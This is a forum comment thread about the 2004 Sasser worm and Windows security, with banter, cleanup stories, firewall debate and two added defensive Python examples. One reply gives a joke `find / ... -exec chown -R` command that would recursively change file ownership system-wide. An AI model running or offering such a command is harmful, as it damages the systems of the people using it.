There are honest mistakes, then there's a dereliction of service or duty, and this sounds like the latter from your description. You may be allowed to file a formal complaint against that bozo, or notify up the food chain there until you get to the nearest elected official in charge of the bozo. If it's like my state it can't be ignored, either.
I just thought it would be apparent from context...
;)
But thanks, anyway
Someone modding me insightful for that one is much funnier than the joke itself... :O
But you got modded insightful. I guess I shouldn't have confused mod intent with poster intent.
The new worm
The worm typically shuts down the computer then automatically re-boots it, repeating the procedure several times. Hypponen said computers behind a firewall should be spared from the attack.
And how is this different than a typical Windows install?
If for some unknown reason you're NOT using swaret...
"swaret --update"
"swaret --upgrade"
Centralization breaks the internet.
It is common knowledge that Microsoft products are by default about as safe from penetration as a prostitute's vagina, and Microsoft is no doubt aware that most of its users will never change the default settings.
Microsoft has demonstrated, and continues to demonstrate, a complete inability to produce secure software regardless of supposed efforts to do so, probably because they are suffering from chronic featuritis and will not remove an insecure item if it will also break some (most likely useless) feature.
For as long as this mentality continues, their products will remain bloated and insecure.
We are now approaching the point where other operating systems can compete with Windows tit for tat, and as those alternatives surpass Windows, Microsoft's featuritis and inability to rectify the mess that is their source code will turn around and kick their feet out from under them.
I was aiming at funny, but was completely surprised when I saw the moderation results...
That's interesting.
:P
Apparently your sarcasm detector is set on "low".
(ps. it was a joke)
Had last run WU a day or two before this patch came out. And unfortunately was reading this article from a dorm LAN instead of either my apartment or work LANs, which are fire-walled. :(
FYI, what I got hit with was actually a variant of a different worm updated to use this exploit, meaning the worst may be yet to come when someone splices this onto a worm that actually does damage. Once I got updated virus defs from another machine and rebooted in safe mode Norton ate the thing for lunch no problem. Only their write-up says that the virus makes reg key changes that weren't there. And now I have no idea whether some of the massive pile of alphabet soup in my process manager is residual virus stuff or not. Sigh.
Can I use it without having to mess with Product Activation?
Sure I have a licence, but don't want to run into extra efforts.
Does anybody out there know what would happen if I updated from SP1 (which brought me quite some trouble in this respect)?
change the associations in the registry to point at your new app. (Start with CLSID under HKLM, also under Internet Explorer in software settings to change your view source command. Even a blind search and replace is probably safe enough.)
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
I only run Linux and OS X at home, so walking my mom through getting rid of this virus today (while she was 1000+ miles away) on XP was a challenge. I had her dnld stinger and spybotpro, and got things cleaned up (I thought she had McAfee running...). Damn, I need to move back home so I can install Linux for her and demand that she get DSL so I can admin it.
PVCB
free ipod and free gmail!
It seems that for anybody running the Service Pack 2 preview release (which has a lot of nice features such as IE popup blocking, better wireless client etc), there's no hope of patching your system as Microsoft has not made an SP2-compatible patch available yet. The downloadable patches won't install and Windows Update v5 doesn't show the new patches there.
> Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?
yes - but all my friends/relatives don't. have had several frantic calls tonight...
I wish they'd port this to Linux so I get to use this worm.
Oh, maybe WineX will run it?
3. Windows is cheaper than Linux even though Linux is free. It's a TCO type of thing.
What you mean is that it's cheaper to hire somebody to fix a Windows box than a Linux box. There is a grain of truth in this. Windows often packs up for no apparent reason. Almost any unskilled monkey can "fix" a broken Windows box just by hoicking out the power lead, counting to ten and putting it back. Linux only ever misbehaves with a good reason, and requires someone who knows their arsehole from their earhole to fix it.
^^^^^^^^
I work in IT and we rarely see issues with software on our machines. It's always the hardware nowadays. Sure if you get hit with spyware and shit like that you may have problems but that's NOT a flaw in Windows. You'd get the same garbage if they targeted Linux.
With a little common sense Windows will not crash unless you're running poorly written software. Of course you'll still blame Microsoft when someone like Adobe hasn't patched their distiller software in 2 years.
http://www.freebsd.org
http://www.netbsd.org
http://www.openbsd.org
http://www.apple.com/macosx
I dunno, a little "self contact" always helps me to relax!
warning: attempt at humour follows.
...er where did he go?
Windows' House
A worm appears. Windows is surprised.
Enter Worm
Windows (moronically): duh hello? What are you doing in here?
Worm (aloof): Hey windows, how's it goin? Just wonderin' if I could, ya know, come on in for a bit. I know you don't really know me and all, but I just kinda found you here..
Windows: duh you look like an old friend.. what's his name, Bob.. Blast.. something or other. Ok since you're already here, it's not much, but there's a nice breeze that blows through.
Worm: Can I leave some of my stuff here?
Windows: Ok by me, there's a whole bunch of stuff here, people come by all the time picking stuff up, dropping it off. (helpfully) Let me take that for you.
Worm: Nice! Ummm, while I'm here, I have some code, and I just need a bit... err.. executed. Is that ok?
Windows (wary): Well... I don't know you that well.
Worm: C'mon, please? I'm friends with that guy in, uh, the service department, obviously I couldn't get in if he didn't let me in.
Windows (relieved): Oh him! Oh yeah, he's friends with a lot of people. Ok, I'll execute the code... there ya go all done.
Worm: Excellent. Ok, gotta go.
Enter Zone Alarm
Zone Alarm (alarmed): What's all this then? Who's this guy? Where is he trying to go? Why wasn't I alerted?!
Windows: Oh, he's just... a guy.. he came in for a bit.
Zone Alarm: How did he get in??
Windows (frustrated): Through the service entrance, I told you I got a lot of things going through there and don't want you bothering me about it all the time. The last time you blocked off the service entrance no one could get through.
Zone Alarm: Well don't let him out...
Exeunt Worm
Zone Alarm:
Windows (ashamed): Out the service entrance.
Zone Alarm: That's it I quit.
Exeunt Zone Alarm
THE END
For the last hour my WinXP box has been shutting itself down because of a crash in lsass. It's caused by a program called avserve2.exe being dropped into the Windows\ directory, and added to the startup sequence.
(Note: I haven't had a chance to actually read this thread yet. If someone else has already warned everyone about avserve2.exe, please disregard this message.)
Where do you find the list of shit that Windows needs just to boot, so you don't BSOD your machines with a GP? And then can't undo the GP because it won't boot far enough to execute the GP.
Honest question. If you have the answer. Thanks in Advance. I'd love to implement this in several companies I manage.
Who will guard the guards?
The problem is most lusers just click "yes" (install, trust, etc) to any dialog box they see.
I actually suspected that all along. But, when you're fighting a troll, you want to be really sure that the punch you're about to throw will put them on the floor -- 'cause if it doesn't, you're out of a defensive position.
Je fume. Tu fumes. Nous fûmes!
Cost of ownership is quite a relative term IMO.
Example: How do you calculate the cost of having copies of your private email correspondence and selected private documents from your "My Documents" dir emailed out to everybody by a worm like Klez? Let's say you were gay, that's a fast way to get out of the closet! How about confidential information in a company?
Remember, it's not like they just get emailed around the world to people you don't know anyway, and who probably could care less about you. It's people you regularly have email correspondence with. People who know you!
These kinds of attacks truly are the most damaging to any person or company.
What would an EWOULDBLOCK block, if an EWOULDBLOCK could block would? -- me
yah, so i was bitching bout the average user
... duh ... registry. should it be there?
...
...
a few days ago. sorry bout that, cause i just realised how much god-da*m time i've spent on MS's OSes since DOS came out and i'll just be plain honest with you that more than 80% of my time using the computer after win 3.11 was just getting to know the software/os.
by god, WHERE IS ALL THE DOCUMENTATION!!!!
why do i have to go to a "any" site to find out about XP services?
why is there no database on a MICROSOFT-domain that tells me WHAT should be in the registry and what not? like i found this "k=ku+" registry key in my
what about all these executables in windows dir and system32 directory. WHAT DO THEY DO?
15 years of trial-and-error since using MS
using MS for the sake of it. sure starting to feel like a religion
"please check with your administrator", e.g. me?
The patch was initially released and still shows April 11th as the release date. However, if you download the patch on April 28th or later you'll see they fixed bugs in it and re-posted the file with the same original date instead of creating a new entry for April 28th. I got lucky and read about this on netcraft.
This is scary shit to me since there is now no easy way to know if MS has fixed a fix. Bad form Microsoft, bad form.
Sorry to be pedantic,
find / -name "*base*" -exec chown -R us {} \;
works better.
Yeah, but not everyone is as fastidious as you. In my line of work, I have experienced all sorts of idiots who shouldn't be allowed to use a pocket calculator, never mind the Internet. I've had to deal with people who don't know the difference between an e-mail address and a website URL, and even one person who didn't know the difference between an e-mail address and their own name! And the scary part is, these were the most tech-literate people working for their own companies. I've tried saying to people, "Get your IT person to set your Outlook Express {they always use that, despite the fact that anyone with half a brain knows how terrible it is} up with these parameters ....." and found that the clueless tosser on the other end was the IT person. {Even if our internal "no source, no sale" policy didn't forbid using Outlook Express our end, it would still be such a horrible buggy piece of software we wouldn't touch it with a barge pole; but these people insist on using it}. If they were running Linux, I could just get them to temporarily set a new root password, SSH into their box, set everything up for them, and that would be Job Done.
Well-set-up Windows systems can be much more secure than badly-set-up Linux systems. The trouble is that Linux users tend to {have to} be more clued-up. Part of the problem is the way Windows is pre-installed on so many machines. The supplier has to keep everything as general-purpose as possible, because they don't know what requirements the user's ISP will place on them -- which, in practice, means rather permissive defaults. In turn, the fact that it just works at first, despite the unnecessary ports and services, leads users not to think about security until it's too late already. With Linux {some obsolete RedHat versions excepted}, everything starts off inactive -- you have to select only what you want to allow. But that probably would also happen if users had to install Windows for themselves; or, even if pre-installed Windows systems had to be configured up from a "deny-all" situation. It means you have to use your brain a little bit, but that's hardly a bad thing -- as harsh as this may sound, it's more important that the job should be done properly, for the sake of other Internet users, than easily and maybe badly.
Hmmmm... I honestly want to know why I need a firewall. I run linux. I know exactly which ports are open (lsof, netstat and nmap can tell me), only the ones that should be, and I use tcp-wrappers when I want to limit access to a subnet.
Exactly what would a firewall do for me?
Opinions stated are mine and do not reflect those of the Illuminati
This is a very helpful free tool: It can scan IP ranges for computers that are vulnerable to be affected by the Sasser worm. Download here. "A Windows network admin utility for remotely detecting LSASS vulnerability released in the MS04-011 bulletin. Allows you to scan multiple IP ranges and send an alert message to vulnerable systems."
I mean I understand that it replicates and all, but most viruses are programmed to perform specific tasks.
Like popping-up ads on the user's machine, redirecting the user's browsing requests, DDOSing SCO, etc...
What is this virus's goal other than replicating?
I don't know the meaning of the word 'don't' - J
Sloppy, sloppy, sloppy! You can't install Mac OS X on a PC - therefore it's no good for virus removal on one. Same reason I didn't list Yellow Dog Linux.
The other BSDs are OK.
Darwin runs fine on x86, however, and rumours have Apple running OS X internally on x86.
Let's say you are the CIO for a Fortune 500. Is that valid reasoning for not using a firewall?
Security is about levels. Just because you lock all your doors and windows doesn't mean you don't need an alarm/fence/guard dog. Of course, you can run a system that has nothing on it in your house and you probably won't ever have a need for a firewall.
Just as an example, let's say you run a file sharing service on your Linux box (Samba). You figure it's Linux so it's safe, and you don't patch regularly and don't run a firewall. While I personally enjoy Samba, it does have the occasional security flaw and, if unpatched and left open to the world, can potentially be exploited. Patching and/or a firewall can significantly reduce the chances of your system being compromised because (a) the exploit won't work and (b) the attacker can't connect to use the exploit.
I'll go one further, albeit even further off-topic. An acquaintance of mine has so confused the concepts of dial-up, email, and bandwidth that they are actively reselling their own dial-up account. The justification for this astonishing business is the premise that the ISP provides him with unlimited email accounts and bandwidth despite it being very clear that he only gets one dial-up account. Even after trying to explain calmly to the poor fellow that email and bandwidth have to do with the ISP's connection to the rest of the net versus their connection to him, he still is trying to resell his $50 "business" account to 25 "customers" at $10 apiece.
I suspect he'll get away with it for a little while, but sooner or later they will cut him off... or something of his anyway...
This explained nothing to me. Your strange analogies about extra protection seemed completely irrelevant. I just don't see how a firewall gives me extra protection.
I don't run Samba and if I did I would use hosts.allow to limit access to the IPs that should have it. What additional security can iptables (or whatever) give me? I am not making an argument. I just don't understand what it is good for outside a complicated business environment.
The original poster seems to think that it adds some mysterious level of protection that everybody needs.
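The disagreement above comes down to what tcp-wrappers can and cannot cover. As an added example (not any poster's code), here is a small audit that reads constructed `ss -ltn` output and a constructed /etc/hosts.allow and reports the wildcard listeners that hosts.allow cannot protect, which is exactly the gap a packet filter closes; the port-to-daemon table and the assumption about which daemons are linked against libwrap are mine and should be adjusted for a real host.

```python
"""Audit listening TCP sockets against tcp-wrappers coverage.

Added example for the firewall discussion above, not code from any poster.
It parses constructed `ss -ltn` output and a constructed /etc/hosts.allow
and reports every wildcard listener that tcp-wrappers cannot protect. The
port-to-daemon table and the libwrap assumptions are mine; adjust them.
"""
import re

# Constructed sample of what `ss -ltn` might print on a small Linux host.
SS_OUTPUT = """\
State   Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN  0      128    0.0.0.0:22          0.0.0.0:*
LISTEN  0      50     0.0.0.0:139         0.0.0.0:*
LISTEN  0      50     0.0.0.0:445         0.0.0.0:*
LISTEN  0      128    127.0.0.1:631       0.0.0.0:*
LISTEN  0      100    0.0.0.0:25          0.0.0.0:*
"""

# Constructed /etc/hosts.allow: sshd restricted to one subnet, nothing else.
HOSTS_ALLOW = """\
# shell access only from the office LAN
sshd: 192.168.1.0/255.255.255.0
"""

# Assumed port -> (daemon, honours tcp-wrappers?). Samba, CUPS and the MTA
# are assumed not to be linked against libwrap on this host.
PORT_TABLE = {
    22: ("sshd", True),
    25: ("sendmail", False),
    139: ("smbd", False),
    445: ("smbd", False),
    631: ("cupsd", False),
}

LISTEN_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s", re.M)


def parse_listeners(ss_text):
    """Return [(bind_address, port)] for the LISTEN rows of `ss -ltn`."""
    return [(m.group(1), int(m.group(2))) for m in LISTEN_RE.finditer(ss_text)]


def parse_hosts_allow(text):
    """Return the set of daemon names that have a hosts.allow rule."""
    daemons = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if ":" in line:
            for name in line.split(":", 1)[0].split(","):
                daemons.add(name.strip())
    return daemons


def audit(ss_text, hosts_allow_text, port_table=PORT_TABLE):
    """Classify every listener as local-only, wrapped or unwrapped.

    local-only: bound to loopback, unreachable from the network.
    wrapped:    daemon honours tcp-wrappers and has a hosts.allow rule.
    unwrapped:  reachable from anywhere and tcp-wrappers cannot intervene,
                so only patching or a packet filter stands in the way.
    """
    allowed = parse_hosts_allow(hosts_allow_text)
    report = []
    for addr, port in parse_listeners(ss_text):
        daemon, uses_wrappers = port_table.get(port, ("unknown", False))
        if addr.startswith("127.") or addr == "::1":
            verdict = "local-only"
        elif uses_wrappers and daemon in allowed:
            verdict = "wrapped"
        else:
            verdict = "unwrapped"
        report.append((port, daemon, verdict))
    return report


def exposed_ports(ss_text, hosts_allow_text):
    """Ports a packet filter would have to cover on this host."""
    return sorted(p for p, _, v in audit(ss_text, hosts_allow_text)
                  if v == "unwrapped")


if __name__ == "__main__":
    for port, daemon, verdict in audit(SS_OUTPUT, HOSTS_ALLOW):
        print(f"{port:>5}  {daemon:<9} {verdict}")
    print("needs a packet filter:", exposed_ports(SS_OUTPUT, HOSTS_ALLOW))
```

On the sample, sshd is covered by hosts.allow but the Samba and mail listeners are not, which is the case where iptables adds something tcp-wrappers never could.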
Sometimes boldness is in fashion. Sometimes only the brave will be bold.
In any case, you can do a 'show all headers'. Look at the 'Received' lines... Ignore the first line (it's going to be from your ISP), and any other lines that seem to indicate that your ISP bounced the messages around internal boxes. The next IP after that is going to be either direct from the box, or its related ISP service. (ignore the name that often turns out to be incorrect/misleading)
Do a 'whois' lookup on that IP, and send an email to the 'abuse' owner of the netblock. (this is where Linux comes in handy). If the IP is the address of a box you know, then you're in trouble.
I actually have a set of perl & shell scripts that take a message with forwarded attachments, peel out each attachment, look at the headers, do the necessary logic and then email the responsible ISP. I'm a bit lazy, though. I just look at the reverse DNS and use that to get the name of the responsible ISP.
At that point, I just have to gather up all of the day's virus emails, and forward them to 'report@localhost' and let Linux do the rest of the work for me.
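The header walk described in the post above, as an added example that is not the poster's perl/shell script: it parses a constructed message, skips the ISP's internal hops, ignores the claimed name in favour of the bracketed address, and stops at the trust boundary where headers could have been forged by the sender. The ISP relays are recognised by a caller-supplied domain suffix, which is an assumption; every host name and address in the sample is made up.

```python
"""Trace a virus e-mail back to the host that handed it to your ISP.

Added example for the 'show all headers' procedure above; it is not the
poster's perl/shell script. The message and every host name and address
in it are constructed, and the ISP's own relays are recognised by a
caller-supplied domain suffix (an assumption; use your ISP's real names).
"""
import email
import re

# Constructed message: two internal ISP hops above the real handoff.
RAW_MESSAGE = b"""\
Received: from mx2.example-isp.net (mx2.example-isp.net [198.51.100.9])
\tby pop.example-isp.net with ESMTP id abc123; Sat, 1 May 2004 20:12:01 -0400
Received: from mx1.example-isp.net ([198.51.100.5])
\tby mx2.example-isp.net with ESMTP; Sat, 1 May 2004 20:11:58 -0400
Received: from friendlypc (dsl-77.example-cable.net [203.0.113.77])
\tby mx1.example-isp.net with SMTP id xyz789; Sat, 1 May 2004 20:11:55 -0400
From: "A Friend" <friend@example.org>
To: you@example-isp.net
Subject: Your document

Please see the attached document.
"""

# "from <claimed name> (<reverse DNS> [<ip>]) ... by <relay that wrote this>"
HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s)\[]+)\s+)?\[(?P<ip>[\d.]+)\]\)"
    r".*?\bby\s+(?P<relay>\S+)",
    re.S,
)


def received_hops(raw):
    """Received headers in header order: the newest (your ISP's) first."""
    msg = email.message_from_bytes(raw)
    return msg.get_all("Received", [])


def parse_hop(header):
    """Return (claimed name, reverse DNS or None, ip, relay) or None."""
    m = HOP_RE.search(header)
    if not m:
        return None
    return m.group("helo"), m.group("rdns"), m.group("ip"), m.group("relay")


def originating_ip(raw, isp_suffix):
    """IP of the first hop outside your ISP, or None if it cannot be found.

    Walk the chain newest-first. Hops recorded by an ISP relay from another
    ISP host are internal bounces and are skipped. The first hop an ISP
    relay recorded from an outside address is the machine that spoke to the
    ISP; the claimed name in front of the brackets is ignored, as the post
    advises. Headers below that were written on the sender's side and may
    be forged, so the walk stops as soon as a non-ISP relay wrote the header.
    """
    for header in received_hops(raw):
        hop = parse_hop(header)
        if hop is None:
            continue
        helo, rdns, ip, relay = hop
        if not relay.endswith(isp_suffix):
            return None  # past the trust boundary: not added by your ISP
        if (rdns or helo).endswith(isp_suffix):
            continue  # internal hop between the ISP's own mail hosts
        return ip
    return None


if __name__ == "__main__":
    # The result is what you would feed to `whois` to find the abuse contact.
    print(originating_ip(RAW_MESSAGE, ".example-isp.net"))  # 203.0.113.77
```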